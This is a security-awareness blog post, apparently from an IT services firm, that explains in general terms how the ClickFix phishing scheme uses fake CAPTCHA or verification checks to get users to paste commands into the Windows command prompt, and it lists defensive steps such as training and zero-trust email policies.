23 Feb Watch out for the ClickFix Phishing Scheme

The ClickFix Phishing Conundrum

Phishing is a potent weapon utilized by malicious actors. If you have an email, phone, or social media account, chances are you have already been the target of social engineering. Phishing aims to steal personal data by deceiving the user, often by impersonating trusted brands, contacts, and even personal relations.

Today, phishing is escalating as a dangerous security risk. AI generative tools enable hackers to easily impersonate brands, names, and trusted sources. Attack surfaces – points of potential entry for malicious actors – have greatly expanded. And now, threat actors are trying out a new, dangerous phishing method: the “ClickFix” way.

This technique differs from standard phishing methods. Typically, phishing attempts – usually done through email – “encourage” recipients to click a contained link or take quick, drastic action. The purpose is to acquire personal information, such as password credentials. While the ClickFix method has the same goal, how it achieves it is different. Understanding the differences is very important for personal and professional security reasons.

What ClickFix Does

ClickFix phishing techniques are a bit more involved than typical social engineering schemes. Instead of link clicking, it’s “resolving” seemingly benign security inquiries, such as the CAPTCHA system. Or, in other cases, solving verification “checks” when interacting with falsified media. The idea is that, once this malicious security check is solved, the code is executed on the user’s end. In other cases, it provides instructions for the user to copy and paste specific commands into the Windows command prompt function, allowing the malicious actor to passively run dangerous operations.

The phishing aspect remains the same, as ClickFix relies heavily on deception. A user would need to “trust” the message in order to apply dangerous executions on their system/server. That’s why attackers rely heavily on brand impersonation, a method made vastly easier with AI generative toolsets. Since success relies on human error, ClickFix phishing can bypass smart defenses and automated flags that otherwise alert security to a breach. There is no automated check to ensure that a user inadvertently “solves” a malicious verification method or similar.

A simplified way to look at a ClickFix chain attack looks as follows:

• User and/or organization is targeted by a phishing email or social engineering scheme
• User is prompted by malicious social engineering to interact, click, and otherwise engage with a falsified security check
• An executed command hijacks the user’s system, typically running executables in the command prompt.
• Malicious payload is delivered, typically an infostealer or ransomware

If and when a malicious actor delivers their payload – or otherwise achieves success – they have lateral access to a user’s system or company network. In many cases, this access is used to steal information, either for additional social-engineering attacks or ransomware demands.

Lures and Phishing Traps

ClickFix phishing involves falsified media or interactive elements to achieve success. A user may be prompted to “resolve” a security issue, provide information, or access a malicious website and input information, similar to most social engineering schemes.

The process involves “human verification,” which is not normally associated with phishing attacks. When encountering a problem and seeking faster resolutions, a user may feel pressured to solve the falsified issue as quickly as possible. Obfuscating their techniques, hackers utilized brand-centric imagery in order to appear legitimate.

In rarer cases, a phishing email attempting to use the ClickFix technique might appear as an account alert related to critical personal information, such as a bank or even social security. Given they carry the same payload dangers as credential theft and ransomware attacks, ClickFix should be taken seriously as a genuine threat to your network integrity.

Mitigating and Reducing Risk

Now, of course, is the tough question: with some cursory knowledge about ClickFix schemes, how do you reduce the risk of falling victim to one of these attacks? Much like phishing, there’s no single answer. Thwarting phishing is a comprehensive process that involves recognizing deception techniques when they arise.

There are, however, a few steps you can take for yourself and your business model:

• Engage in competency and debrief training to highlight the trend of ClickFix attacks
• A zero-trust policy regarding emails from “official” sources
• Refusal to access or interact with unknown media until appropriately verified by official sources
• “If you’re unsure, then ignore!”
• Use of monitoring tools or programs that can watch, quarantine, and remotely execute commands in response to suspected ClickFix phishing.

Remember, the first and most important thing you can do is recognize a threat. ClickFix is merely an evolution of social engineering tactics. Practicing caution and utilizing common sense can go a long when protecting your data from ClickFix.

For additional resources and help, contact Bytagig today for additional information.